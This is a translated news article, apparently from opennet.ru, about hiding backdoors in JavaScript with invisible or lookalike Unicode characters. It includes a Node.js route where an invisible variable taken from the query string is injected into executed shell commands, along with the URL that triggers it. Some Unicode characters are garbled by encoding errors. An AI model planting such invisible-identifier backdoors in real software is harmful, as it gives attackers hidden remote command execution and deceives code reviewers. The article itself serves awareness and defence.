Following the Trojan Source attack method based on the use of Unicode characters that change the display order of bidirectional text, another technique for introducing hidden actions has been published, applicable to JavaScript code. The new method is based on the use of the unicode character "γ €" (code 0x3164, "HANGUL FILLER"), which is a letter but has no visible content. The Unicode category that this character belongs to has been allowed since the ECMAScript 2015 specification for use in JavaScript variable names, which makes it possible to create invisible variables or new variables indistinguishable from other variables in popular code editors such as Notepad++ and VS Code.
As an example, the code for the Node.js platform is given, in which, using a variable consisting of a single character "γ €", a backdoor is hidden that allows you to execute the code specified by the attacker: app.get('/network_health', async (req, res) = > { const { timeout,γ €} = req.query; // actually says "const { timeout,γ € \u3164}" const checkCommands = [ 'ping -c 1 google.com', 'curl -s http:// example.com/',γ € // comma followed by \u3164 ];
At first glance, only the timeout value is passed through the external parameter, and the array with the commands to be executed contains a harmless fixed list. But in fact, after the timeout variable, the value of another invisible variable with the symbol code \u3164 is assigned, which is also substituted into the array of executable commands. Thus, in the presence of such a structure, an attacker can send a request like "https://host:8080/network_health?%E3%85%A4=command" to activate the backdoor and execute his code.
As another example, the character "Η" (ALVEOLAR CLICK) is given, which can be used to give the appearance of indicating an exclamation mark. For example, the expression "if(environmentΗ=ENV_PROD){" when executed in Node.js 14 will always be true, because it does not check for differences, but sets the variable "environmentΗ" to ENV_PROD. Misleading unicode characters include "οΌ", "β", "οΌ", "β©΅", "β¨", "β«½", "κΏ", and "β".
Source: opennet.ru